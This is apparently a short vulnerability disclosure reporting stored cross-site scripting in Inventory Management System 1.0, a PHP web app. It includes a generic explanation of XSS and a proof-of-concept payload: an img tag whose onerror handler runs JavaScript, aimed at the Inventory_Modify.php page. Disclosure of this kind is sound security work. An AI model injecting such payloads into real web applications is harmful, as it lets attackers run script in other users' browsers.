Inventory Management System version 1.0 suffers from a persistent cross site scripting vulnerability.
fed40f755feeceb7c30a23d4efc97d91
## Title: Inventory Management System 1.0 XSS Stored
## Author: Hejap Zairy
## Date: 12.07.2022
## Vendor: https://www.vetbossel.in/inventory-management-system-php/
## Software: https://cutt.ly/lOZ8lrr
## Reference: https://github.com/Matrix07ksa
# Tested on: ArchLinux, MySQL, Apache
## Description:
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.
Status: CRITICAL
[+] Payloads:
```
https://0day_script.gov//Inventory_Modify.php
<img src=1 href=1 onerror="javascript:alert('HEJAP ZAIRY AL-SHARIF')"></img>
```
## Proof and Exploit:
https://streamable.com/4v5h6u